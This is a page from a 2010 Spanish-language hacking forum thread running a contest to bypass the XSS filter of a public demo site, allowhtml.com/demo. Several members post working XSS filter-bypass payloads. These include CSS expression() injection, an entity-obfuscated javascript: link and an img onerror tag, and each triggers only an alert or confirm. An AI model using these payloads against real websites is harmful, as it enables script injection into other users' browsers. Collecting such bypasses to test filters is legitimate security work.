elhacker.net cabecera Bienvenido(a), Visitante. Por favor Ingresar o Registrarse
¿Perdiste tu email de activación?.

 

 


Tema destacado: Trabajando con las ramas de git (tercera parte)


+  Foro de elhacker.net
|-+  Seguridad Informática
| |-+  Hacking
| | |-+  Bugs y Exploits
| | | |-+  Nivel Web (Moderadores: sirdarckcat, WHK)
| | | | |-+  [CYH] Bypass de filtros de XSS :)
0 Usuarios y 1 Visitante están viendo este tema.
Páginas: [1] 2 3 Ir Abajo Respuesta Imprimir
Autor Tema: [CYH] Bypass de filtros de XSS :)  (Leído 12,441 veces)
sirdarckcat
Aspirante a supervillano
Moderador
***
Desconectado Desconectado

Mensajes: 7.023


No estoy loco, soy mentalmente divergente


Ver Perfil WWW
[CYH] Bypass de filtros de XSS :)
« en: 8 Abril 2010, 08:47 am »

Can You Hack?
Semi-allowhtml

CYH es un evento donde todos los usuarios del foro pueden participar y ganar premios y realizar todo tipo de retos :D


Hola!

Los invito a h4x0r3ar este filtro de XSS:
http://allowhtml.com/demo/

Yo lo bypasee hace rato xD
Código:
<div style="xss=\000065xpression(confirm(1))!: url('xD');">hola</div>

Asi que no esta muy dificil!

Los 2 que encuentren mas bypasses antes del 8 de mayo, se ganan cuentas @elhacker.net

Saludos!!
« Última modificación: 13 Abril 2010, 01:39 am por WHK » En línea

tragantras


Desconectado Desconectado

Mensajes: 465


Ver Perfil
Re: Bypass de filtros de XSS :)
« Respuesta #1 en: 8 Abril 2010, 13:50 pm »

alguien que sea generoso puede explicar la cadena que ha puesto sidarckcat

en concreto... el campo style de la etiqueta div

gracias y un saludo :3
En línea

Colaboraciones:
1 2
jdc


Desconectado Desconectado

Mensajes: 3.406


Ver Perfil WWW
Re: Bypass de filtros de XSS :)
« Respuesta #2 en: 8 Abril 2010, 17:38 pm »

Es parte de la celebración de abril negro?
 
No había puesto WHK el filtro de otra página?
En línea

sirdarckcat
Aspirante a supervillano
Moderador
***
Desconectado Desconectado

Mensajes: 7.023


No estoy loco, soy mentalmente divergente


Ver Perfil WWW
Re: Bypass de filtros de XSS :)
« Respuesta #3 en: 8 Abril 2010, 22:11 pm »

el de WHK es PHPIDS
ese es otro


y no tiene nada que ver con abril negro xD
En línea

jdc


Desconectado Desconectado

Mensajes: 3.406


Ver Perfil WWW
Re: Bypass de filtros de XSS :)
« Respuesta #4 en: 8 Abril 2010, 22:15 pm »

ya no encontre nada y me dolio la cabeza, es muy extraño tu xss ¬¬ no lo entiendo o ya esta solucionado?

Código:
<img widht="2000" height="2000" src="http://foro.elhacker.net/Smileys/chef/carita.gif" alt="juas" />


jajajajaja
« Última modificación: 8 Abril 2010, 22:21 pm por janito24 » En línea

Shell Root
Moderador Global
***
Desconectado Desconectado

Mensajes: 3.720


$M


Ver Perfil WWW
Re: Bypass de filtros de XSS :)
« Respuesta #5 en: 8 Abril 2010, 22:23 pm »

Raro, porque?, Creo que es CSS Injection :P, Además si mal no recuerdo, expression es solo para IE!  :silbar:

Código
  1. <XSS STYLE="xss:expression(alert('XSS'))">...
« Última modificación: 8 Abril 2010, 22:27 pm por Alex@ShellRoot » En línea

Por eso no duermo, por si tras mi ventana hay un cuervo. Cuelgo de hilos sueltos sabiendo que hay veneno en el aire.
yasión

Desconectado Desconectado

Mensajes: 48

‮‮


Ver Perfil WWW
Re: Bypass de filtros de XSS :)
« Respuesta #6 en: 8 Abril 2010, 23:07 pm »

Esto hace cosas raras:

Código
  1. <a href="></a>

Es lo primero que he probado, luego lo miro un poco más.
En línea

SeC

Desconectado Desconectado

Mensajes: 109


@susan.


Ver Perfil WWW
Re: Bypass de filtros de XSS :)
« Respuesta #7 en: 10 Abril 2010, 03:36 am »

Ya he probado de mil maneras =/ , esto se ve lindo, pero nada jeje, ta bueno el filtro =P

Código
  1. <a href="javascr&#38;#x0Aipt:a&#38;#x0Alert(1);" target="_blank">asd</a>

En línea

Educad a los niños y no sera necesario castigar a los hombres - Pitagoras.
cgvwzq

Desconectado Desconectado

Mensajes: 57


Agente P.


Ver Perfil WWW
Re: [CYH] Bypass de filtros de XSS :)
« Respuesta #8 en: 14 Abril 2010, 20:36 pm »

Quiero una cuenta... =P

Código:
<script>><img src=x onerror=alert(/cuack/) tr=
En línea

Some stuff:

  • www.a] parsed as ]www.a]
  • Bypass elhacker's img filter with ALT attribute!
  • ¿Para cuándo SQLi I y II? WZ


Shell Root
Moderador Global
***
Desconectado Desconectado

Mensajes: 3.720


$M


Ver Perfil WWW
Re: [CYH] Bypass de filtros de XSS :)
« Respuesta #9 en: 14 Abril 2010, 20:41 pm »

jejejejeje  ;-)
En línea

Por eso no duermo, por si tras mi ventana hay un cuervo. Cuelgo de hilos sueltos sabiendo que hay veneno en el aire.
Páginas: [1] 2 3 Ir Arriba Respuesta Imprimir 

Ir a:  

Mensajes similares
Asunto Iniciado por Respuestas Vistas Último mensaje
bypass
Juegos y Consolas
gordy(D!@bL0) 2 1,555 Último mensaje 28 Abril 2006, 20:19 pm
por gordy(D!@bL0)
Bypass + iSQL
Nivel Web
Shell Root 5 3,130 Último mensaje 1 Junio 2011, 21:01 pm
por .mokk.
Bypass getimagesize() Pregunta.
Nivel Web
dRak0 0 2,952 Último mensaje 27 Noviembre 2013, 02:43 am
por dRak0
Esto es un ByPass?
Dudas Generales
boy-ka 2 1,241 Último mensaje 30 Julio 2015, 19:50 pm
por boy-ka
Bypass
Hacking
Izaya 6 2,247 Último mensaje 23 Marzo 2016, 21:28 pm
por MCKSys Argentina
WAP2 - Aviso Legal - Powered by SMF 1.1.21 | SMF © 2006-2008, Simple Machines